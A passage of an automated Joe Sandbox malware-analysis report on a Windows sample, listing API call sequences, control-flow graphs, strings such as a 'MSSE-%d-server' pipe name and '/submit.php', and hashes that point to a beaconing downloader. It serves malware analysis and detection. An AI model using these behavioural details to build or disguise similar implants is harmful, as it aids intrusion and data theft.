                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 1419689450-856325523
                                                                  • Opcode ID: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
                                                                  • Instruction ID: afa78a67d3ed6694d2fddc4470fc08c662859603b561cba97d8ad7ee6e8a193a
                                                                  • Opcode Fuzzy Hash: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
                                                                  • Instruction Fuzzy Hash: F851DE32700B9186EF20DF26F8407DA77A9F789BA8F404122EE4A57B56EF38C505CB40

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                  • String ID: @P@
                                                                  • API String ID: 649803965-1136412694
                                                                  • Opcode ID: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                                                  • Instruction ID: 0837f65e99a2b31b617579b96e5607858f818787d00fb595da640d4b13c89ff1
                                                                  • Opcode Fuzzy Hash: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                                                  • Instruction Fuzzy Hash: FB7199B2601B0486EB259F56E99476A33A1F745B88F84803BEF49773A1DF7CC884C748

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • GetUserNameA.ADVAPI32 ref: 009A45E3
                                                                  • GetComputerNameA.KERNEL32 ref: 009A45F6
                                                                    • Part of subcall function 0099EC3C: WSASocketA.WS2_32 ref: 0099EC6A
                                                                  • GetModuleFileNameA.KERNEL32 ref: 009A460F
                                                                  • strrchr.LIBCMT ref: 009A4621
                                                                  • GetVersionExA.KERNEL32 ref: 009A4644
                                                                  • _snprintf.LIBCMT ref: 009A46CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Name$ComputerFileModuleSocketUserVersion_snprintfmallocstrrchr
                                                                  • String ID: %s%s%s
                                                                  • API String ID: 2891912487-1891519693
                                                                  • Opcode ID: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
                                                                  • Instruction ID: 1193e19d36976dc9b19a50b40b03a3ac565c052e25fd6eaa0de03f9706c9989e
                                                                  • Opcode Fuzzy Hash: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
                                                                  • Instruction Fuzzy Hash: B741F125B0468086EE04FB2AB95576A7796F7CAFE4F444120EE5A0BB66CF7CC442C744

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocCreateFileHeap$CloseErrorHandleLastMappingViewVirtualhtonl
                                                                  • String ID:
                                                                  • API String ID: 1975060083-0
                                                                  • Opcode ID: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
                                                                  • Instruction ID: 47710c7afb5b938a82dfdf16c250b0567d2000a85d5a71ccf537d66da51749a3
                                                                  • Opcode Fuzzy Hash: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
                                                                  • Instruction Fuzzy Hash: EBE1AF77711B4187EB24DB79E8813AA73A1FB99794F088525DB8A97B52EF3CE041C340

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 460 991184-9911c0 CryptAcquireContextA 461 9911c2-9911e4 CryptAcquireContextA 460->461 462 9911e6-9911f9 call 9be020 460->462 461->462 463 99120c-991216 461->463 466 9911fb 462->466 467 9911fd-99120a CryptReleaseContext 462->467 466->467 467->463
                                                                  APIs
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 009911B8
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 009911DC
                                                                  • CryptGenRandom.ADVAPI32 ref: 009911F0
                                                                  • CryptReleaseContext.ADVAPI32 ref: 00991204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Crypt$Context$Acquire$RandomRelease
                                                                  • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 685801729-4046902070
                                                                  • Opcode ID: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
                                                                  • Instruction ID: a4de32cccdd729242628740d51a5ce2f97955261742eb08a563ff8f6726b60a1
                                                                  • Opcode Fuzzy Hash: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
                                                                  • Instruction Fuzzy Hash: C401B131708B4182FB10CFAAF888799B765F7D8B98F848025D64987365CFB8CA49C740

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 468 401630-40168d CreateNamedPipeA 469 4016dc-4016e5 468->469 470 40168f-4016a1 ConnectNamedPipe 468->470 470->469 471 4016a3-4016a5 470->471 472 4016c6-4016cf CloseHandle 471->472 473 4016a7-4016c4 WriteFile 471->473 472->469 473->472 474 4016d1-4016da 473->474 474->471
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 2239253087-0
                                                                  • Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                                                  • Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
                                                                  • Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                                                  • Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 004017B9
                                                                  • SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                                                    • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                                                    • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                                                  • GetTickCount.KERNEL32 ref: 004017FC
                                                                  • CreateThread.KERNEL32 ref: 00401885
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                                                  • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                                                  • API String ID: 3660650057-1020837823
                                                                  • Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                                                  • Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
                                                                  • Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                                                  • Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • malloc.LIBCMT ref: 0099CB1E
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 009AAC00: malloc.LIBCMT ref: 009AAC50
                                                                    • Part of subcall function 009AAC00: realloc.LIBCMT ref: 009AAC5F
                                                                    • Part of subcall function 0099EFC0: GetLocalTime.KERNEL32 ref: 0099EFDF
                                                                  • malloc.LIBCMT ref: 0099CC10
                                                                  • _snprintf.LIBCMT ref: 0099CC8E
                                                                  • _snprintf.LIBCMT ref: 0099CCB6
                                                                  • free.LIBCMT ref: 0099CE4B
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A5212
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A522A
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A5748
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A575E
                                                                    • Part of subcall function 009A5200: shutdown.WS2_32 ref: 009A577D
                                                                    • Part of subcall function 009A5200: shutdown.WS2_32 ref: 009A5792
                                                                    • Part of subcall function 009A5200: closesocket.WS2_32 ref: 009A579C
                                                                    • Part of subcall function 009A5200: free.LIBCMT ref: 009A57BC
                                                                    • Part of subcall function 009A5200: free.LIBCMT ref: 009A57D1
                                                                  • _snprintf.LIBCMT ref: 0099CCDD
                                                                    • Part of subcall function 009AA324: Sleep.KERNEL32 ref: 009AA367
                                                                    • Part of subcall function 009AA324: ExitThread.KERNEL32 ref: 009AA371
                                                                    • Part of subcall function 009AA324: CreateThread.KERNEL32 ref: 009AA396
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTickmalloc$_snprintffree$Thread_errnoshutdown$AllocCreateExitHeapLocalSleepTime_callnewhclosesocketrealloc
                                                                  • String ID: /submit.php
                                                                  • API String ID: 864391129-1804779596
                                                                  • Opcode ID: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
                                                                  • Instruction ID: 56a5bde57ccfc82b830e410fac2a010b46cb16021ee67dd7187f22aff7d76dda
                                                                  • Opcode Fuzzy Hash: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
                                                                  • Instruction Fuzzy Hash: 3991C03170024187DF14FFB9A8527AE3395BBD6784F904429BE4A87B96DF38C909C791

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 475 d0128-d014e 478 d014f-d016b 475->478 480 d030e-d032f VirtualAlloc 478->480 481 d0171-d0174 478->481 485 d0331-d034e InternetReadFile 480->485 482 d017a 481->482 483 d0306-d0307 481->483 482->478 483->480 485->483 486 d0350-d0358 485->486 486->485 487 d035a-d0364 486->487
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE ref: 000D0328
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocFileInternetReadVirtual
                                                                  • String ID: U.;
                                                                  • API String ID: 3591508208-4213443877
                                                                  • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                                                  • Instruction ID: e093d90e11704a09136074875a9385388f860374ac695588df902a519100a8e3
                                                                  • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                                                  • Instruction Fuzzy Hash: 66116D6034990D0BE66895AE7C9A73A11CAD7D8765F24823FB40EC33D9ED54CC83816A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 488 d00d2-d0365 LoadLibraryA InternetOpenA call d0109 493 d036a-d0378 488->493
                                                                  APIs
                                                                  • LoadLibraryA.KERNELBASE ref: 000D00ED
                                                                  • InternetOpenA.WININET(00000000,00000000), ref: 000D0105
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InternetLibraryLoadOpen
                                                                  • String ID: wini
                                                                  • API String ID: 2559873147-1606035523
                                                                  • Opcode ID: 371bfa33e720023473f7d1b57c4fdab5f43ae4f0dd8e10e8118ab3ec3442ea05
                                                                  • Instruction ID: 3a87a5131821d0ddbc4c84022818a1b3a98ae8a190d023c930f00ac223b6326d
                                                                  • Opcode Fuzzy Hash: 371bfa33e720023473f7d1b57c4fdab5f43ae4f0dd8e10e8118ab3ec3442ea05
                                                                  • Instruction Fuzzy Hash: C1F0204051C7D92AE32D2938681A3377A89C787305F288AAFE0CBC2683C8510C4280B6

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 494 99ec3c-99ec77 call 99ed34 call 9be658 499 99ec79-99ec7b 494->499 500 99ec80-99ecbf WSAIoctl 494->500 501 99ed1e-99ed32 499->501 502 99ecdc-99ece6 500->502 503 99ecc1-99ecd8 500->503 504 99ece8 502->504 505 99ed13-99ed16 call 9be5e0 502->505 503->502 507 99eced-99ecf7 504->507 508 99ed1c 505->508 509 99ecf9-99ecfc 507->509 510 99ecfe-99ed0a 507->510 508->501 509->510 511 99ed0e 509->511 510->505 512 99ed0c 510->512 511->505 512->507
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: IoctlSocketStartupclosesocket
                                                                  • String ID:
                                                                  • API String ID: 365704328-0
                                                                  • Opcode ID: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
                                                                  • Instruction ID: c6998820aeb3eb6717c5563c6d241ee598cd2f4ad0746d86bc973b69a6a7364d
                                                                  • Opcode Fuzzy Hash: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
                                                                  • Instruction Fuzzy Hash: D121927270478482EB20CF28B54079AB799F7887E8F544625EE9D43B89DB3DC5458B00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 513 401595-4015c5 VirtualAlloc 514 4015c7-4015c9 513->514 515 4015e0-40162c call 401563 VirtualProtect CreateThread 514->515 516 4015cb-4015de 514->516 516->514
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocCreateProtectThread
                                                                  • String ID:
                                                                  • API String ID: 3039780055-0
                                                                  • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                                                  • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                                                                  • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                                                  • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 519 401704-40175c CreateFileA 520 40179c-4017a5 519->520 521 40175e-401760 519->521 522 401781-40178f CloseHandle 521->522 523 401762-40177f ReadFile 521->523 522->520 523->522 524 401791-40179a 523->524 524->521
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleRead
                                                                  • String ID:
                                                                  • API String ID: 1035965006-0
                                                                  • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                                                  • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                                                                  • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                                                  • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 525 d0109-d019f InternetConnectA call d0128 531 d014f-d016b 525->531 533 d030e-d032f VirtualAlloc 531->533 534 d0171-d0174 531->534 538 d0331-d034e InternetReadFile 533->538 535 d017a 534->535 536 d0306-d0307 534->536 535->531 536->533 538->536 539 d0350-d0358 538->539 539->538 540 d035a-d0364 539->540
                                                                  APIs
                                                                  • InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 000D0124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConnectInternet
                                                                  • String ID: U.;
                                                                  • API String ID: 3050416762-4213443877
                                                                  • Opcode ID: 6461e000310a584dadf843701745a51b7c54c1a02fe81d3d8c993301fa1bf7ef
                                                                  • Instruction ID: 6127167accb197b00c8a3c83219f0d44e8510ba1f26c2e76f8ff358ac84f4210
                                                                  • Opcode Fuzzy Hash: 6461e000310a584dadf843701745a51b7c54c1a02fe81d3d8c993301fa1bf7ef
                                                                  • Instruction Fuzzy Hash: 5C01F2503B8A882EE66C862C6C1BB3B22CDC7C5726B24D36FF14BC22C7E8408C434529

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 541 d02eb-d030b 543 d030e-d032f VirtualAlloc 541->543 545 d0331-d034e InternetReadFile 543->545 546 d0306-d0307 545->546 547 d0350-d0358 545->547 546->543 547->545 548 d035a-d0364 547->548
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE ref: 000D0328
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocFileInternetReadVirtual
                                                                  • String ID:
                                                                  • API String ID: 3591508208-0
                                                                  • Opcode ID: 787ed7849923a0638b55286bb4b0c9b8b3b55a8494a6a148c50ba00b0fa82116
                                                                  • Instruction ID: 08c6e0097d16fd9d5bf4d43ade2cd5ca3a3f1cf240245f266af754fa7a215f6d
                                                                  • Opcode Fuzzy Hash: 787ed7849923a0638b55286bb4b0c9b8b3b55a8494a6a148c50ba00b0fa82116
                                                                  • Instruction Fuzzy Hash: C901F56124D6CA0FD31AA6A96C613AA26D9DB59358F2800AFE04CC7287DA59CD438329
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtualhtonl
                                                                  • String ID:
                                                                  • API String ID: 2902677218-0
                                                                  • Opcode ID: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
                                                                  • Instruction ID: c8bcc57ae2d8a9cccb519cffa6f9d94194073d06cf5667baa168e6de9e47a6ca
                                                                  • Opcode Fuzzy Hash: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
                                                                  • Instruction Fuzzy Hash: 5F219D3271478192EB60DF26F580B9A73A4F7D9B84F449432EE8A43B19DF38C445CB80
                                                                  APIs
                                                                    • Part of subcall function 009AA948: RevertToSelf.ADVAPI32 ref: 009AA956
                                                                  • InternetCloseHandle.WININET ref: 0099E6B0
                                                                  • InternetCloseHandle.WININET ref: 0099E6BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleInternet$RevertSelf
                                                                  • String ID:
                                                                  • API String ID: 841312091-0
                                                                  • Opcode ID: 2ed4f708f2ae633ca0e893511461a1621bf721b5dd3249825a990886b3c25dec
                                                                  • Instruction ID: c1d9bec4808571e5fc70cceca728a23cb9ba717d618734765e5da3d29bacf2b9
